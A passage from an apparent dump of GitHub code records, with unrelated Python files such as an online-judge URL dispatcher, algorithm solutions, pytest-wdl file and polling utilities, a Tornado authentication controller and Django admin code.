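CX, CY = 317.47191, 243.0783   # principal point in pixels (from the file above)

def back_project(u: float, v: float, depth_m: float) -> np.ndarray:
    # Standard pinhole model: X = (u - cx) * Z / fx, Y = (v - cy) * Z / fy
    return np.array([(u - CX) * depth_m / FX, (v - CY) * depth_m / FY, depth_m])

print(back_project(320, 240, 2.0))  # a pixel near the image centre at 2 m depth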
py:data:: submissions\n\n    :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Submission` ] ]\n\n    contains classes to use for :py:func:`submission_from_url`\n\"\"\"\n\nfrom typing import List, Optional, Type\n\nfrom onlinejudge.type import Contest, Problem, Service, Submission\n\nsubmissions = []  # type: List[Type['Submission']]\n\n\ndef submission_from_url(url: str) -> Optional[Submission]:\n    for cls in submissions:\n        submission = cls.from_url(url)\n        if submission is not None:\n            return submission\n    return None\n\n\nproblems = []  # type: List[Type['Problem']]\n\n\ndef problem_from_url(url: str) -> Optional[Problem]:\n    \"\"\"\n    >>> onlinejudge.dispatch.problem_from_url(\"https://atcoder.jp/contests/abc077/tasks/arc084_b\")\n    \n\n    >>> onlinejudge.dispatch.problem_from_url(\"https://codeforces.com/contest/1012/problem/D\")\n    \n    \"\"\"\n\n    for cls in problems:\n        problem = cls.from_url(url)\n        if problem is not None:\n            return problem\n    return None\n\n\ncontests = []  # type: List[Type['Contest']]\n\n\ndef contest_from_url(url: str) -> Optional[Contest]:\n    for cls in contests:\n        contest = cls.from_url(url)\n        if contest is not None:\n            return contest\n    return None\n\n\nservices = []  # type: List[Type['Service']]\n\n\ndef service_from_url(url: str) -> Optional[Service]:\n    for cls in services:\n        service = cls.from_url(url)\n        if service is not None:\n            return service\n    submission = submission_from_url(url)\n    if submission is not None:\n        return submission.get_service()\n    problem = problem_from_url(url)\n    if problem is not None:\n        return problem.get_service()\n    return None\n","repo_name":"online-judge-tools/api-client","sub_path":"onlinejudge/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"75"} +{"seq_id":"25042809881","text":"def maximum_index(l):\n    # Return the index of the largest element; None for non-lists and empty lists.\n    if not isinstance(l, list) or l == []:\n        return None\n    max_value = l[0]\n    index = 0\n    for pos, i in enumerate(l):\n        if i > max_value:\n            max_value = i\n            index = pos\n    return index\n\nprint(maximum_index(\"papa\"))","repo_name":"thetheos/BAC1INFO1","sub_path":"Revision/mission4/max_index.py","file_name":"max_index.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70049003442","text":"import math\nimport sys\ninput = sys.stdin.readline\n\n\ndef find_max(l, r):\n    target = -9999999999\n    while True:\n        if l > r:\n            break\n        if l % 2:\n            target = max(target, tree[l])\n            l += 1\n        if r % 2 == 0:\n            target = max(tree[r], target)\n            r -= 1\n        r //= 2\n        l //= 2\n    return target\n\n\ndef swap(idx):\n    if idx == 1:\n        return\n    else:\n        if idx % 2:\n            tree[idx // 2] = max(tree[idx-1], tree[idx])\n        else:\n            tree[idx // 2] = max(tree[idx], tree[idx+1])\n        swap(idx//2)\n\n\nn, m, q = map(int, input().split())\n\narr = [*map(int, input().split())]\nh = int(math.log(n, 2)) if math.log(n, 2) / int(math.log(n, 2)) == 1 else int(math.log(n, 2)) + 1\n\nleft = list(sorted(map(int, input().split())))\nright = list(sorted(map(int, input().split())))\n\ntree = [-9999999999] * 2 ** (h+1)\nfor i in range(n):\n    node = 2 ** h + i\n    temp = arr[i]\n    while node != 0:\n        tree[node] = max(tree[node], temp)\n        node //= 2\nfor _ in range(q):\n    a, b = map(int, input().split())\n    tree[2 ** h + a - 1], tree[2 ** h + b - 1] = tree[2 ** h + b - 1], tree[2 ** h + a - 1]\n    swap(2 ** h + a - 1)\n    swap(2 ** h + b - 1)\n    dic = {}\n    res = 0\n    for i in range(m):\n        if left[i] <= right[i]:\n            if 
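# --- Illustrative aside (not part of the dataset records above) ---
# onlinejudge/dispatch.py above relies on a registry pattern: concrete
# classes are appended to module-level lists and each *_from_url helper
# tries them in turn. A self-contained sketch of the same idea; DummyProblem
# is a hypothetical stand-in, not a class from the real onlinejudge package.
from typing import List, Optional, Type

class DummyProblem:
    @classmethod
    def from_url(cls, url: str) -> Optional["DummyProblem"]:
        # A real implementation would parse the URL; here we just prefix-match.
        return cls() if url.startswith("https://judge.example/") else None

problems: List[Type[DummyProblem]] = [DummyProblem]

def problem_from_url(url: str) -> Optional[DummyProblem]:
    for cls in problems:
        problem = cls.from_url(url)
        if problem is not None:
            return problem
    return None

print(problem_from_url("https://judge.example/p/1"))      # DummyProblem instance
print(problem_from_url("https://elsewhere.example/p/1"))  # None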
dic.get((left[i], right[i])) is None:\n                dic[(left[i], right[i])] = find_max(2**h + left[i]-1, 2 ** h + right[i]-1)\n            res = max(res, dic[(left[i], right[i])])\n        else:\n            res = 10 ** 9\n    print(res)\n","repo_name":"SINHOLEE/Algorithm","sub_path":"python/beckjun/17082.py","file_name":"17082.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28635840036","text":"import fileinput\nimport itertools\nimport sys\n\nT = int(next(sys.stdin))\n\nfor t, N in enumerate(itertools.islice((int(line) for line in sys.stdin), T), 1):\n    if N == 0:\n        print('Case #{:d}: INSOMNIA'.format(t))\n    else:\n        digits = set()\n        i = 0\n        while len(digits) < 10:\n            i += 1\n            digits.update(set(str(i * N)))\n        print('Case #{:d}: {:d}'.format(t, i * N))\n","repo_name":"DaHuO/Supergraph","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_jbnicolai_main.py","file_name":"16_0_1_jbnicolai_main.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32591380281","text":"from django import forms\nfrom .models import product\n\n\nclass prodForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = product\n\t\tfields = [\n\t\t\t'title',\n\t\t\t'description',\n\t\t\t'price'\n\t\t]\n\nclass RawProdForm(forms.Form):\n\ttitle = forms.CharField(widget=forms.TextInput(attrs = {\n\t\t\t\"placeholder\" : \"come on :)\"\n\t\t}))\n\tdescription = forms.CharField(required=False, widget=forms.Textarea(attrs = {\n\t\t\t\"class\" : \"newOne\",\n\t\t\t\"rows\" : 5,\n\t\t\t\"cols\" : 50,\n\t\t\t\"placeholder\" : \"just do it\"\n\t\t\t})\n\t\t)\n\tprice = forms.DecimalField(initial=0.00)","repo_name":"nikkeo/Projects-on-python","sub_path":"firstTryDjango/src/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16746088614","text":"import contextlib\nimport fnmatch\nimport hashlib\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport shutil\nimport stat\nimport tempfile\nimport time\nfrom typing import Callable, Optional, Sequence, Union, cast\n\nfrom py._path.local import LocalPath\n\n\nLOG = logging.getLogger(\"pytest-wdl\")\nLOG.setLevel(os.environ.get(\"LOGLEVEL\", \"WARNING\").upper())\n\nENV_PATH = \"PATH\"\nENV_CLASSPATH = \"CLASSPATH\"\nDEFAULT_CLASSPATH = \".\"\n\nUNSAFE_RE = re.compile(r\"[^\\w.-]\")\n\n\ndef safe_string(s: str, replacement: str = \"_\") -> str:\n    \"\"\"\n    Makes a string safe by replacing non-word characters.\n\n    Args:\n        s: The string to make safe\n        replacement: The replacement string\n\n    Returns:\n        The safe string\n    \"\"\"\n    return UNSAFE_RE.sub(replacement, s)\n\n\n# def deprecated(f: Callable):\n#     \"\"\"\n#     Decorator for deprecated functions/methods. 
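# --- Illustrative aside (not part of the dataset records above) ---
# 17082.py above builds an iterative max segment tree: leaves sit at indices
# [size, 2*size) and each parent stores the max of its two children, so a
# range query walks inward from both ends in O(log n). A self-contained sketch:
def build_max_tree(values):
    size = 1
    while size < len(values):
        size *= 2
    tree = [float("-inf")] * (2 * size)
    for i, v in enumerate(values):
        tree[size + i] = v
    for i in range(size - 1, 0, -1):
        tree[i] = max(tree[2 * i], tree[2 * i + 1])
    return tree, size

def query_max(tree, size, lo, hi):
    # Max over the closed index interval [lo, hi].
    lo += size
    hi += size
    best = float("-inf")
    while lo <= hi:
        if lo % 2 == 1:  # lo is a right child: take it and step right
            best = max(best, tree[lo])
            lo += 1
        if hi % 2 == 0:  # hi is a left child: take it and step left
            best = max(best, tree[hi])
            hi -= 1
        lo //= 2
        hi //= 2
    return best

tree, size = build_max_tree([3, 1, 4, 1, 5, 9, 2, 6])
assert query_max(tree, size, 2, 5) == 9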
Deprecated functionality will be\n# removed before each major release.\n# \"\"\"\n# def decorator(*args, **kwargs):\n# LOG.warning(f\"Function/method {f.__name__} is deprecated and will be removed\")\n# f(*args, **kwargs)\n# return decorator\n\n\n@contextlib.contextmanager\ndef chdir(todir: Path):\n \"\"\"\n Context manager that temporarily changes directories.\n\n Args:\n todir: The directory to change to.\n \"\"\"\n curdir = Path.cwd()\n try:\n os.chdir(todir)\n yield todir\n finally:\n os.chdir(curdir)\n\n\n@contextlib.contextmanager\ndef tempdir(\n change_dir: bool = False,\n tmproot: Optional[Path] = None,\n cleanup: Optional[bool] = True,\n) -> Path:\n \"\"\"\n Context manager that creates a temporary directory, yields it, and then\n deletes it after return from the yield.\n\n Args:\n change_dir: Whether to temporarily change to the temp dir.\n tmproot: Root directory in which to create temporary directories.\n cleanup: Whether to delete the temporary directory before exiting the context.\n \"\"\"\n temp = ensure_path(tempfile.mkdtemp(dir=tmproot))\n try:\n if change_dir:\n with chdir(temp):\n yield temp\n else:\n yield temp\n finally:\n if cleanup:\n shutil.rmtree(temp)\n\n\n@contextlib.contextmanager\ndef context_dir(\n path: Optional[Path] = None,\n change_dir: bool = False,\n cleanup: Optional[bool] = None,\n) -> Path:\n \"\"\"\n Context manager that looks for a specific environment variable to specify a\n directory. If the environment variable is not set, a temporary directory is\n created and cleaned up upon return from the yield.\n\n Args:\n path: The environment variable to look for.\n change_dir: Whether to change to the directory.\n cleanup: Whether to delete the directory when exiting the context. If None,\n the directory is only deleted if a temporary directory is created.\n\n Yields:\n A directory path.\n \"\"\"\n if cleanup is None:\n cleanup = path is None\n\n if not path:\n path = Path(tempfile.mkdtemp())\n elif not path.exists():\n path.mkdir(parents=True)\n\n try:\n if change_dir:\n with chdir(path):\n yield path\n else:\n yield path\n finally:\n if cleanup and path.exists():\n shutil.rmtree(path, ignore_errors=True)\n\n\ndef ensure_path(\n path: Union[str, LocalPath, Path],\n search_paths: Optional[Sequence[Path]] = None,\n canonicalize: bool = True,\n exists: Optional[bool] = None,\n is_file: Optional[bool] = None,\n executable: Optional[bool] = None,\n create: bool = False,\n) -> Path:\n \"\"\"\n Converts a string path or :class:`py.path.local.LocalPath` to a\n :class:`pathlib.Path`.\n\n Args:\n path: The path to convert.\n search_paths: Directories to search for `path` if it is not already absolute.\n If `exists` is True, looks for the first search path that contains the file,\n otherwise just uses the first search path.\n canonicalize: Whether to return the canonicalized version of the path -\n expand home directory shortcut (~), make absolute, and resolve symlinks.\n exists: If True, raise an exception if the path does not exist; if False,\n raise an exception if the path does exist.\n is_file: If True, raise an exception if the path is not a file; if False,\n raise an exception if the path is not a directory.\n executable: If True and `is_file` is True and the file exists, raise an\n exception if it is not executable.\n create: Create the directory (or parent, if `is_file` = True) if\n it does not exist. 
Ignored if `exists` is True.\n\n Returns:\n A `pathlib.Path` object.\n \"\"\"\n if isinstance(path, Path):\n p = cast(Path, path)\n else:\n p = Path(str(path))\n\n p = Path(os.path.expandvars(p))\n\n if canonicalize:\n p = p.expanduser()\n\n if search_paths and not p.is_absolute():\n if exists:\n for search_path in search_paths:\n p_tmp = search_path / p\n if p_tmp.exists():\n p = p_tmp.absolute()\n break\n else:\n p = (search_paths[0] / p).absolute()\n\n p = p.resolve()\n\n if p.exists():\n if exists is False:\n raise FileExistsError(f\"Path {p} already exists\")\n if is_file is True:\n if p.is_dir():\n raise IsADirectoryError(f\"Path {p} is not a file\")\n elif executable and not is_executable(p):\n raise OSError(f\"File {p} is not executable\")\n elif is_file is False and not p.is_dir():\n raise NotADirectoryError(f\"Path {p} is not a directory\")\n elif exists is True:\n raise FileNotFoundError(f\"Path {p} does not exist\")\n elif create:\n if is_file:\n p.parent.mkdir(parents=True, exist_ok=True)\n else:\n p.mkdir(parents=True, exist_ok=True)\n\n return p\n\n\ndef resolve_file(\n filename: Union[str, Path], project_root: Path, assert_exists: bool = True\n) -> Optional[Path]:\n \"\"\"\n Finds `filename` under `project_root` or in the project path.\n\n Args:\n filename: The filename, relative path, or absolute path to resolve.\n project_root: The project root dir.\n assert_exists: Whether to raise an error if the file cannot be found.\n\n Returns:\n A `pathlib.Path` object, or None if the file cannot be found and\n `assert_exists` is False.\n\n Raises:\n FileNotFoundError if the file cannot be found and `assert_exists` is True.\n \"\"\"\n path = ensure_path(filename, canonicalize=False)\n is_abs = path.is_absolute()\n\n if is_abs and path.exists():\n return path\n\n if not is_abs:\n check_path = ensure_path(project_root / path)\n if check_path.exists():\n return check_path\n # Search in cwd\n check_path = find_project_path(path)\n if check_path and check_path.exists():\n return check_path\n # Search upward from project root\n check_path = find_project_path(path, start=project_root)\n if check_path and check_path.exists():\n return check_path\n\n if assert_exists:\n raise FileNotFoundError(f\"Could not resolve file: {filename}\")\n else:\n return None\n\n\ndef find_project_path(\n *filenames: Union[str, Path],\n start: Optional[Path] = None,\n return_parent: bool = False,\n assert_exists: bool = False,\n) -> Optional[Path]:\n \"\"\"\n Starting from `path` folder and moving upwards, search for any of `filenames` and\n return the first path containing any one of them.\n\n Args:\n *filenames: Filenames to search. 
Either a string filename, or a sequence of\n string path elements.\n start: Starting folder\n return_parent: Whether to return the containing folder or the discovered file.\n assert_exists: Whether to raise an exception if a file cannot be found.\n\n Returns:\n A `Path`, or `None` if no folder is found that contains any of `filenames`.\n If `return_parent` is `False` and more than one of the files is found one\n of the files is randomly selected for return.\n\n Raises:\n FileNotFoundError if the file cannot be found and `assert_exists` is True.\n \"\"\"\n path = start or Path.cwd()\n while path != path.parent:\n for filename in filenames:\n if isinstance(filename, str):\n found = list(path.glob(filename))\n found = found[0] if found else None\n else:\n found = path / filename\n if not found.exists():\n found = None\n if found:\n LOG.debug(\"Found %s in %s\", filename, path)\n if return_parent:\n return path\n else:\n return found\n else:\n path = path.parent\n\n if assert_exists:\n raise FileNotFoundError(\n f\"Could not find any of {','.join(str(f) for f in filenames)} \"\n f\"starting from {start}\"\n )\n\n return None\n\n\ndef find_executable_path(\n executable: str, search_path: Optional[Sequence[Path]] = None\n) -> Optional[Path]:\n \"\"\"Finds 'executable' in `search_path`.\n\n Args:\n executable: The name of the executable to find.\n search_path: The list of directories to search. If None, the system search\n path (defined by the $PATH environment variable) is used.\n\n Returns:\n Absolute path of the executable, or None if no matching executable was found.\n \"\"\"\n if search_path is None:\n if ENV_PATH in os.environ:\n search_path = [Path(p) for p in os.environ[ENV_PATH].split(os.pathsep)]\n else:\n return None\n for path in search_path:\n exe_path = path / executable\n if exe_path.exists() and is_executable(exe_path):\n return exe_path\n else:\n return None\n\n\ndef is_executable(path: Path) -> bool:\n \"\"\"\n Checks if a path is executable.\n\n Args:\n path: The path to check\n\n Returns:\n True if `path` exists and is executable by the user, otherwise False.\n \"\"\"\n return path.exists() and os.stat(path).st_mode & stat.S_IXUSR\n\n\ndef find_in_classpath(glob: str) -> Optional[Path]:\n \"\"\"\n Attempts to find a .jar file matching the specified glob pattern in the\n Java classpath.\n\n Args:\n glob: JAR filename pattern\n\n Returns:\n Path to the JAR file, or None if a matching file is not found.\n \"\"\"\n classpath = os.environ.get(ENV_CLASSPATH, DEFAULT_CLASSPATH)\n\n for path_str in classpath.split(os.pathsep):\n path = ensure_path(path_str)\n if path.exists():\n if path.is_dir():\n matches = list(path.glob(glob))\n if matches:\n if len(matches) > 1:\n LOG.warning(\n \"Found multiple jar files matching pattern %s: %s;\"\n \"returning the first one.\",\n glob,\n matches,\n )\n return matches[0]\n elif path.exists() and fnmatch.fnmatch(path.name, glob):\n return path\n\n\ndef env_map(d: dict) -> dict:\n \"\"\"\n Given a mapping of keys to value descriptors, creates a mapping of the keys to\n the described values.\n \"\"\"\n envmap = {}\n for name, value_descriptor in d.items():\n value = resolve_value_descriptor(value_descriptor)\n if value:\n envmap[name] = value\n return envmap\n\n\ndef resolve_value_descriptor(value_descriptor: Union[str, dict]) -> Optional:\n \"\"\"\n Resolves the value of a value descriptor, which may be an environment variable\n name, or a map with keys `env` (the environment variable name) and `value` (the\n value to use if `env` is not specified 
or if the environment variable is unset).\n\n    Args:\n        value_descriptor: The value descriptor to resolve.\n\n    Returns:\n        The resolved value, or None if it cannot be resolved.\n    \"\"\"\n    if isinstance(value_descriptor, str):\n        return os.environ.get(value_descriptor)\n    elif \"env\" in value_descriptor:\n        return os.environ.get(value_descriptor[\"env\"], value_descriptor.get(\"value\"))\n    else:\n        return value_descriptor.get(\"value\")\n\n\nclass DigestsNotEqualError(AssertionError):\n    pass\n\n\ndef compare_files_with_hash(file1: Path, file2: Path, hash_name: str = \"md5\"):\n    file1_digest = hash_file(file1, hash_name)\n    file2_digest = hash_file(file2, hash_name)\n    if file1_digest != file2_digest:\n        raise DigestsNotEqualError(\n            f\"{hash_name} digests differ between expected identical files \"\n            f\"{file1}, {file2}\"\n        )\n\n\ndef hash_file(path: Path, hash_name: str = \"md5\") -> str:\n    assert hash_name in hashlib.algorithms_guaranteed\n    with open(path, \"rb\") as inp:\n        hashobj = hashlib.new(hash_name)\n        hashobj.update(inp.read())\n    return hashobj.hexdigest()\n\n\ndef verify_digests(path: Path, digests: dict):\n    for hash_name, expected_digest in digests.items():\n        try:\n            actual_digest = hash_file(path, hash_name)\n        except AssertionError:  # TODO: test this\n            LOG.warning(\n                \"Hash algorithm %s is not supported; cannot verify file %s\",\n                hash_name,\n                path,\n            )\n            continue\n        if actual_digest != expected_digest:\n            raise DigestsNotEqualError(\n                f\"{hash_name} digest {actual_digest} of file \"\n                f\"{path} does not match expected value {expected_digest}\"\n            )\n\n\nclass PollingException(Exception):\n    \"\"\"Base exception that stores the last result seen.\"\"\"\n    def __init__(self, last=None):\n        self.last = last\n\n\nclass TimeoutException(PollingException):\n    \"\"\"Exception raised if polling function times out\"\"\"\n\n\nclass MaxCallException(PollingException):\n    \"\"\"Exception raised if maximum number of iterations is exceeded\"\"\"\n\n\ndef poll(\n    target: Callable,\n    step: int = 1,\n    args: Optional[Sequence] = None,\n    kwargs: Optional[dict] = None,\n    timeout: Optional[int] = None,\n    max_tries: Optional[int] = None,\n    check_success: Callable = bool,\n    step_function: Optional[Callable[[int, int], int]] = None,\n    ignore_exceptions: Sequence = (),\n):\n    \"\"\"\n    Poll by calling a target function until a certain condition is met. You must specify\n    at least a target function to be called and the step -- base wait time between\n    each function call.\n\n    Vendored from the [polling](https://github.com/justiniso/polling) package.\n\n    Args:\n        target: The target callable\n        step: Step defines the amount of time to wait (in seconds)\n        args: Arguments to be passed to the target function\n        kwargs: Keyword arguments to be passed to the target function\n        timeout: The target function will be called until the time elapsed is greater\n            than the maximum timeout (in seconds). NOTE that the actual execution\n            time of the function *can* exceed the time specified in the timeout. For\n            instance, if the target function takes 10 seconds to execute and the timeout\n            is 21 seconds, the polling function will take a total of 30 seconds (two\n            iterations of the target --20s which is less than the timeout--21s,\n            and a final iteration)\n        max_tries: Maximum number of times the target function will be called before\n            failing\n        check_success: A callback function that accepts the return value of the target\n            function. It must return true if you want the polling function to stop\n            and return this value. It must return false if you want to continue\n            polling. You may also use this function to collect non-success values. 
The\n default is a callback that tests for truthiness (anything not False, 0,\n or empty collection).\n step_function: A callback function that accepts two arguments: current_step,\n num_tries; and returns the next step value. By default, this is constant,\n but you can also pass a function that will increase or decrease the step.\n As an example, you can increase the wait time between calling the target\n function by 10 seconds every iteration until the step is 100 seconds--at\n which point it should remain constant at 100 seconds\n\n >>> def my_step_function(current_step: int, num_tries: int) -> int:\n >>> return max(current_step + 10, 100)\n\n ignore_exceptions: You can specify a tuple of exceptions that should be caught\n and ignored on every iteration. If the target function raises one of\n these exceptions, it will be caught and the exception instance will be\n pushed to the queue of values collected during polling. Any other exceptions\n raised will be raised as normal.\n\n Returns:\n The first value from the target function that meets the condions of the\n check_success callback. By default, this will be the first value that is not\n None, 0, False, '', or an empty collection.\n \"\"\"\n max_time = time.time() + timeout if timeout else None\n tries = 0\n last_item = None\n\n if args is None:\n args = ()\n\n if kwargs is None:\n kwargs = {}\n\n while True:\n if max_tries and tries >= max_tries:\n raise MaxCallException(last_item)\n\n try:\n val = target(*args, **kwargs)\n last_item = val\n except ignore_exceptions as e:\n last_item = e\n else:\n # Condition passes, this is the only \"successful\" exit from the\n # polling function\n if check_success(val):\n return val\n\n tries += 1\n\n # Check the time after to make sure the poll function is called at least once\n if max_time and time.time() >= max_time:\n raise TimeoutException(last_item)\n\n time.sleep(step)\n\n if step_function:\n step = step_function(step, tries)\n","repo_name":"EliLillyCo/pytest-wdl","sub_path":"pytest_wdl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18200,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"75"} +{"seq_id":"20470517271","text":"\n## this is write by qingluan \n# just a inti handler \n# and a tempalte offer to coder\nimport json\nimport tornado\nimport tornado.web\nimport socks\nfrom tornado.websocket import WebSocketHandler\nfrom .libs import TornadoApi\nfrom .libs import TornadoArgs\n\nfrom mroylib import auth\nfrom mroylib.auth import Authentication\nfrom mroylib.config import Config\nimport logging\nimport os\n\ncon = Config(name='swordnode.ini')\ncon.section = 'user'\nauth.USER_DB_PATH = con['tel_user_db']\n\nlogging.basicConfig(level=logging.INFO)\n\nclass BaseHandler(tornado.web.RequestHandler):\n def prepare(self):\n self.db = self.settings['db']\n self.L = self.settings['L']\n self.tloop = tornado.ioloop.IOLoop.current()\n def get_current_user(self):\n return (self.get_cookie('user'),self.get_cookie('passwd'))\n def get_current_secure_user(self):\n return (self.get_cookie('user'),self.get_secure_cookie('passwd'))\n def set_current_seccure_user_cookie(self,user,passwd):\n self.set_cookie('user',user)\n self.set_secure_cookie(\"passwd\",passwd)\n\n def json_reply(self,data):\n self.write(json.dumps(data))\n\n\nclass SocketHandler(WebSocketHandler):\n \"\"\" Web socket \"\"\"\n clients = set()\n con = dict()\n \n @staticmethod\n def send_to_all(msg):\n for con in SocketHandler.clients:\n 
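# --- Illustrative aside (not part of the dataset records above) ---
# Hedged usage sketch for the vendored poll() helper defined above (assumes
# pytest-wdl is installed so that pytest_wdl.utils is importable): retry a
# flaky callable once per second until it returns a truthy value, raising
# TimeoutException after ~5 s or MaxCallException after 10 calls.
import itertools

from pytest_wdl.utils import poll

calls = itertools.count()

def flaky() -> bool:
    return next(calls) >= 2  # the first two calls fail, the third succeeds

assert poll(target=flaky, step=1, timeout=5, max_tries=10) is True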
con.write_message(json.dumps(msg))\n    \n    @staticmethod\n    def send_to_one(msg, conn_id):\n        SocketHandler.con[conn_id].write_message(msg)\n\n    def json_reply(self, msg):\n        self.write_message(json.dumps(msg))\n\n    def open(self):\n        SocketHandler.clients.add(self)\n        SocketHandler.con[id(self)] = self\n    \n    def on_close(self):\n        SocketHandler.clients.remove(self)\n    \n    def on_message(self, msg):\n        SocketHandler.send_to_all(msg)\n\n\n\nclass AuthHandler(BaseHandler):\n\n    @tornado.web.asynchronous\n    def post(self):\n        # get the arguments expected from the request\n        parser = TornadoArgs(self, tp='tornado')\n        cmd = parser.get_parameter(\"cmd\")\n        phone = parser.get_parameter(\"phone\")\n        token = parser.get_parameter(\"token\")\n        code = parser.get_parameter(\"code\")\n        proxy = parser.get_parameter(\"proxy\")\n\n        _auth = Authentication(self.settings['user_db_path'], loop=self.tloop)\n        if cmd == 'regist':\n            _auth.registe(phone, token)\n            self.json_reply({'msg': 'regist ok'})\n            self.finish()\n        elif cmd == 'login':\n            def _reply(x, client):\n                \n                self.json_reply({\"api\": x})\n                self.finish()\n            logging.info(f\"Logging in: {phone} {code}\")\n            _auth.login(phone, code, _reply)\n            \n        elif cmd == 'auth':\n            \n            _auth.sendcode(phone)\n            self.json_reply({'msg':'please receive code!'})\n            self.finish()\n        else:\n            self.json_reply({\"msg\":f'error cmd: {cmd}'})\n            self.finish()\n        \n\nclass IndexHandler(BaseHandler):\n    \n    def prepare(self):\n        super(IndexHandler, self).prepare()\n        self.template = \"template/index.html\"\n\n    def get(self):\n        # L is the log helper, which includes ok, info, err, fail, wrn\n        self.L.ok('got')\n        return self.render(self.template, post_page=\"/\")\n\n    \n    \n\n    @tornado.web.asynchronous\n    def post(self):\n        # get the arguments expected from the request\n        parser = TornadoArgs(self, tp='tornado')\n        proxy = parser.get_parameter(\"proxy\")\n\n        api = TornadoApi(name=parser.module, loop=self.tloop, callback=parser.after_dealwith)\n        logging.error(f\"Permission : {api.Permission}\")\n        key = parser.get_parameter(\"Api-key\", l='head')\n        if api.Permission == \"auth\":\n            \n            if not key:\n                self.json_reply({'error': 'No auth key!'})\n                self.finish()\n            else:\n                logging.info(f\"load db: {self.settings['user_db_path']} \")\n                _auth = Authentication(self.settings['user_db_path'], proxy=proxy, loop=self.tloop)\n                if _auth.if_auth(key.strip()):\n                    res = api.run(*parser.args, **parser.kwargs)\n                    if res:\n                        self.json_reply({'msg': res})\n                        self.finish()\n                else:\n                    self.json_reply({'error': 'No auth!'})\n                    self.finish()\n        else:\n            res = api.run(*parser.args, **parser.kwargs)\n            if res:\n                self.json_reply({'msg': res})\n                self.finish()\n\n    ","repo_name":"Qingluan/swordnode","sub_path":"swordserver/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16904655969","text":"from django.contrib import admin\nfrom django.contrib.admin.models import DELETION, LogEntry\nfrom django.db.models import Exists, OuterRef\nfrom django.urls import reverse\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\n\nfrom app.common.enums import GroupType\nfrom app.content import models\nfrom app.group.models.membership import 
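# --- Illustrative aside (not part of the dataset records above) ---
# Minimal, self-contained sketch of the broadcast pattern SocketHandler uses
# above: keep every open connection in a class-level set and fan each message
# out to all of them. The port and route here are arbitrary example values.
import json

import tornado.ioloop
import tornado.web
from tornado.websocket import WebSocketHandler

class BroadcastHandler(WebSocketHandler):
    clients = set()

    def open(self):
        BroadcastHandler.clients.add(self)

    def on_close(self):
        BroadcastHandler.clients.discard(self)

    def on_message(self, message):
        payload = json.dumps({"msg": message})
        for client in BroadcastHandler.clients:
            client.write_message(payload)

if __name__ == "__main__":
    tornado.web.Application([(r"/ws", BroadcastHandler)]).listen(8888)
    tornado.ioloop.IOLoop.current().start()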
Membership\n\nadmin.site.register(models.News)\nadmin.site.register(models.Category)\nadmin.site.register(models.PriorityPool)\nadmin.site.register(models.Cheatsheet)\nadmin.site.register(models.Page)\nadmin.site.register(models.ShortLink)\nadmin.site.register(models.Toddel)\nadmin.site.register(models.QRCode)\n\n\n@admin.register(models.Strike)\nclass StrikeAdmin(admin.ModelAdmin):\n list_display = (\n \"user\",\n \"event\",\n \"description\",\n \"strike_size\",\n )\n raw_id_fields = (\n \"user\",\n \"event\",\n \"creator\",\n )\n search_fields = (\n \"user__user_id\",\n \"event__title\",\n \"user__first_name\",\n \"user__last_name\",\n )\n\n\ndef admin_delete_registration(modeladmin, request, queryset):\n for registration in queryset:\n registration.admin_unregister()\n\n\n@admin.register(models.Registration)\nclass RegistrationAdmin(admin.ModelAdmin):\n list_display = (\"user\", \"event\", \"is_on_wait\", \"has_attended\")\n search_fields = (\n \"user__user_id\",\n \"event__title\",\n \"user__first_name\",\n \"user__last_name\",\n )\n readonly_fields = (\"created_at\", \"updated_at\")\n list_filter = (\n \"is_on_wait\",\n \"has_attended\",\n \"event\",\n \"user\",\n )\n # Enables checks bypassing from the 'Action' dropdown in Registration overview\n actions = [\n admin_delete_registration,\n ]\n\n\nclass SlackConnectedListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they have connected to their Slack-user\"\"\"\n\n title = \"har tilkoblet Slack-bruker\"\n parameter_name = \"slack_connected\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"true\":\n return queryset.exclude(slack_user_id__exact=\"\")\n if self.value() == \"false\":\n return queryset.filter(slack_user_id__exact=\"\")\n\n\nclass AffiliatedStudyListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they're connected to a study\"\"\"\n\n title = \"har studie-medlemskap\"\n parameter_name = \"affiliated_study\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n connected_query = Exists(\n Membership.objects.filter(\n user__user_id=OuterRef(\"pk\"), group__type=GroupType.STUDY\n )\n )\n if self.value() == \"true\":\n return queryset.filter(connected_query)\n if self.value() == \"false\":\n return queryset.filter(~connected_query)\n\n\nclass AffiliatedStudyyearListFilter(admin.SimpleListFilter):\n \"\"\"Filters users checking if they're connected to a studyyear\"\"\"\n\n title = \"har studieår-medlemskap\"\n parameter_name = \"affiliated_studyyear\"\n\n def lookups(self, *args, **kwargs):\n return (\n (\"true\", \"Ja\"),\n (\"false\", \"Nei\"),\n )\n\n def queryset(self, request, queryset):\n connected_query = Exists(\n Membership.objects.filter(\n user__user_id=OuterRef(\"pk\"), 